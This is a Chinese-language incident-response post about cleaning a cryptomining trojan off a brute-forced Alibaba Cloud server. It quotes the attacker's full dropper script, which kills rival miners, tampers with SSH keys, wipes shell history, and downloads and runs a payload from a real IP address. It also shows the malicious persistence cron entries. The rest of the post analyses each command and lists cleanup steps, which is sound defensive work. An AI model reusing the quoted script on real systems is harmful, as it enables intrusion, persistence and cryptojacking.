涉及挖矿程序、ECS暴力破解成功、恶意脚本代码执行多阶段异常处理心得

背景：
　　阿里云服务器报警：有木马植入，服务器cpu飙升。
处理：

 

1. #木马植入命令：<br>./network rm -rf /var/tmp/Documents ; <br>mkdir /var/tmp/Documents 2>&1 ; <br>crontab -r ; <br>chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1 ; <br>cd /var/tmp ; <br>chattr -iae /var/tmp/Documents/.diicot ; <br>pkill Opera ; pkill cnrig ; pkill java ; <br>killall java ;  <br>pkill xmrig ; <br>killall cnrig ; <br>killall xmrig ;<br>cd /var/tmp/; <br>mv /var/tmp/diicot /var/tmp/Documents/.diicot ; <br>mv /var/tmp/kuak /var/tmp/Documents/kuak ; <br>cd /var/tmp/Documents ; <br>chmod +x .* ; <br>/var/tmp/Documents/.diicot >/dev/null 2>&1 & disown ; <br>history -c ; <br>rm -rf .bash_history ~/.bash_history ; <br>rm -rf /tmp/cache ; cd /tmp/ ; <br>wget -q 85.31.47.99/.NzJjOTYwxx5/.balu || curl -O -s -L 85.31.47.99/.NzJjOTYwxx5/.balu ; <br>mv .balu cache ; chmod +x cache ; <br>./cache >/dev/null 2>&1 & disown  ; <br>history -c ; <br>rm -rf .bash_history ~/.bash_history

复制代码

　　命令分析：

• 初始化操作
  
  
  
  • rm -rf /var/tmp/Documents：强制删除/var/tmp/Documents目录（可能用于清理旧痕迹）
    
  • mkdir /var/tmp/Documents 2>&1：创建新的/var/tmp/Documents目录，并将错误输出重定向（避免显示错误信息）
    
  • crontab -r：删除当前用户的所有定时任务（清除可能存在的其他任务或防御机制）
    
  
  
• 权限篡改与进程清理
  
  
  
  • chattr -iae ~/.ssh/authorized_keys >/dev/null 2>&1：移除 SSH 授权密钥文件的特殊属性（可能为了后续篡改 SSH 密钥留后门）
    
  • 一系列pkill和killall命令：强制终止 Opera 浏览器、java 程序以及 xmrig、cnrig 等挖矿程序（可能是为了清除竞争对手的恶意程序，或关闭可能的监控软件）
    
  
  
• 恶意文件隐藏与执行
  
  
  
  • chattr -iae /var/tmp/Documents/.diicot：移除恶意文件的特殊属性（使其可修改和执行）
    
  • mv命令：将diicot和kuak文件移动到隐藏目录（伪装成正常文档目录下的文件）
    
  • chmod +x .*：为隐藏文件添加执行权限
    
  • /var/tmp/Documents/.diicot >/dev/null 2>&1 & disown：后台执行恶意程序.diicot，并脱离终端控制（使其在后台持续运行）
    
  
  
• 痕迹清理
  
  
  
  • history -c：清除当前会话的命令历史
    
  • rm -rf .bash_history ~/.bash_history：删除保存的命令历史文件（避免被发现操作痕迹）
    
  
  
• 下载并执行新的恶意程序
  
  
  
  • 通过wget或curl从85.31.47.99这个 IP 地址下载名为.balu的文件
    
  • 将下载的文件重命名为cache并添加执行权限
    
  • 后台执行该程序并再次清理命令历史
    
  
  

 　　补救措施：
　　1. 关闭服务器ssh端口
　　2. 查看当前运行的异常进程：

1. ps aux | grep -E "diicot|kuak|cache|xmrig|cnrig"  # 结合恶意脚本中的进程名排查
2. top/htop  # 观察CPU/内存占用异常的进程（如挖矿程序通常占用高资源）

复制代码

　　

1. [ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z ~]$ ps aux | grep -E "diicot|kuak|cache|xmrig|cnrig"
2. root      3836  0.0  0.0 1227348 3340 ?        Sl   04:04   0:00 cache
3. www      26335  0.0  0.1 196180 11772 ?        S    Aug03   0:02 nginx: cache manager process
4. ecs-ass+ 31383  0.0  0.0 112812   988 pts/0    R+   10:08   0:00 grep --color=auto -E diicot|kuak|cache|xmrig|cnrig

复制代码

　　3.强制终止可疑进程（使用进程 ID，如1234）：

1. [/code][code]sudo kill -9 3836
   
2. sudo rm -rf /tmp/cache /var/tmp/Documents
   
3. 
   
4. //检查是否有其他关联文件或进程复活机制（如定时任务）：
   
5. sudo crontab -l # 查看当前用户定时任务
   
6. sudo ls -la /etc/cron* # 检查系统级定时任务

复制代码

　top结果：

1. top - 10:20:22 up 64 days, 14:19,  0 users,  load average: 15.06, 12.13, 10.91
2. Tasks: 204 total,   8 running, 195 sleeping,   1 stopped,   0 zombie
3. %Cpu(s): 52.2 us, 47.8 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.1 si,  0.0 st
4. KiB Mem :  7732792 total,   272968 free,  4592416 used,  2867408 buff/cache
5. KiB Swap:        0 total,        0 free,        0 used.  2514492 avail Mem
7.   PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                       
8. 3868 root      20   0 2441952   2.3g      4 S  73.1 31.1 646:32.16 151e8df3                                                                                      
9. 31337 www       20   0  244260  27740   4920 R  47.5  0.4   1:35.97 php-fpm                                                                                       
10. 31458 www       20   0  244256  27244   4920 R  45.8  0.4   0:47.46 php-fpm                                                                                       
11. 31871 www       20   0  244196  27972   4912 R  44.2  0.4   0:34.83 php-fpm                                                                                       
12. 32106 www       20   0  242148  26684   4900 R  43.2  0.3   0:14.48 php-fpm                                                                                       
13. 32182 www       20   0  244196  27088   4848 R  43.2  0.4   0:06.68 php-fpm                                                                                       
14. 31430 www       20   0  242216  26768   4916 R  42.2  0.3   1:49.48 php-fpm                                                                                       
15. 32238 www       20   0  233952  17176   4840 S  10.6  0.2   0:00.32 php-fpm                                                                                       
16. 32102 www       20   0  244256  27208   4876 S   8.3  0.4   0:24.24 php-fpm                                                                                       
17. 31875 www       20   0  242208  25208   4920 S   7.6  0.3   0:30.23 php-fpm                                                                                       
18. 31429 www       20   0  242148  25696   4916 S   7.3  0.3   0:59.79 php-fpm                                                                                       
19. 31874 www       20   0  242148  26692   4884 S   7.3  0.3   0:30.45 php-fpm                                                                                       
20. 31876 www       20   0  242208  25756   4920 S   7.3  0.3   0:51.94 php-fpm                                                                                       
21. 31903 www       20   0  242144  27176   4904 S   7.0  0.4   0:09.00 php-fpm                                                                                       
22. 1117 root      20   0 2436596  17372   6900 S   1.0  0.2 411:08.98 argusagent                                                                                    
23. 24119 root      20   0  231340  83840  10360 S   1.0  1.1 295:33.94 AliYunDunMonito                                                                              
24. 2036 redis     20   0  565288 249392   1996 S   0.3  3.2 228:12.62 redis-server                                                                                 
25. 22120 root      20   0  686528   9628   5172 S   0.3  0.1  35:45.96 aliyun-service                                                                                
26. 24086 root      20   0  118508   8144   4832 S   0.3  0.1  85:02.77 AliYunDun                                                                                    
27. 26331 www       20   0  245704  69064  10580 S   0.3  0.9   5:56.22 nginx                                                                                         
28. 26333 www       20   0  250752  74476  10576 S   0.3  1.0  23:57.13 nginx                                                                                         
29. 32232 ecs-ass+  20   0  162104   2348   1592 R   0.3  0.0   0:00.03 top                                                                                          
30.     1 root      20   0   51868   3664   2144 S   0.0  0.0   9:03.38 systemd

复制代码

 　

1. 查找151e8df3进程的可执行文件路径：<br>sudo ls -l /proc/3868/exe # 进程未终止时，通过proc查看执行路径 # 若已终止，搜索系统中类似名称的文件 sudo find / -name "151e8df3" -type f<br>sudo rm -f /path/to/151e8df3

复制代码

 
　　定时任务的处理：

1. [ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z tmp]$ sudo crontab -l
2. @daily /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
3. @reboot /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
4. * * * * * /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
5. @monthly /var/tmp/9659fb05/./80ff5709 > /dev/null 2>&1 & disown
6. [ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z tmp]$ sudo ls -la /etc/cron*
7. -rw-------  1 root root    0 May 16  2023 /etc/cron.deny
8. -rw-r--r--. 1 root root  451 Jun 10  2014 /etc/crontab
10. /etc/cron.d:
11. total 16
12. drwxr-xr-x.  2 root root 4096 Jun 28  2024 .
13. drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..
14. -rw-r--r--   1 root root  128 May 16  2023 0hourly
15. -rw-------   1 root root  235 Dec 16  2022 sysstat
17. /etc/cron.daily:
18. total 16
19. drwxr-xr-x.  2 root root 4096 Jun 28  2024 .
20. drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..
21. -rwx------.  1 root root  219 Apr  1  2020 logrotate
22. -rwxr-xr-x.  1 root root  618 Oct 30  2018 man-db.cron
24. /etc/cron.hourly:
25. total 12
26. drwxr-xr-x.  2 root root 4096 Jun 28  2024 .
27. drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..
28. -rwxr-xr-x   1 root root  392 May 16  2023 0anacron
30. /etc/cron.monthly:
31. total 8
32. drwxr-xr-x.  2 root root 4096 Jun 10  2014 .
33. drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..
35. /etc/cron.weekly:
36. total 8
37. drwxr-xr-x.  2 root root 4096 Jun 10  2014 .
38. drwxr-xr-x. 87 root root 4096 Aug 13 09:54 ..

复制代码

1. sudo crontab -r  # 清除当前用户（root）的所有定时任务<br>sudo rm -rf /var/tmp/9659fb05 # 删除整个恶意程序目录

复制代码

 
　　4.禁用恶意文件执行权限

1. chmod -x /var/tmp/Documents/.* /tmp/cache
2. rm -rf /var/tmp/Documents /tmp/cache

复制代码

　　5.查看/etc/rc.local等开机启动脚本：

1. sudo cat /etc/rc.local

复制代码

　　6.木马禁止删除：

1. [ecs-assist-user@iZ2zef6hu7zpvvnltbgss3Z f46a6fbd]$ sudo rm -rf /var/tmp/f46a6fbd/
2. rm: cannot remove ‘/var/tmp/f46a6fbd/80ff5709’: Operation not permitted

复制代码

1. # 进入目录
2. cd /var/tmp/f46a6fbd/
4. # 查看文件属性（若有i或a属性，需移除）
5. lsattr 80ff5709
7. # 移除特殊属性（-i移除不可修改，-a移除仅追加）
8. sudo chattr -ia 80ff5709

复制代码

　　7.扫描代码篡改

1. # 搜索近期新增的可疑PHP文件（如包含eval、base64_decode等危险函数的文件）
2. sudo find /path/to/website -name "*.php" -mtime -7  # 查找7天内新增的PHP文件
3. sudo grep -r "eval(" /path/to/website  # 搜索包含危险函数的文件

复制代码

 

来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！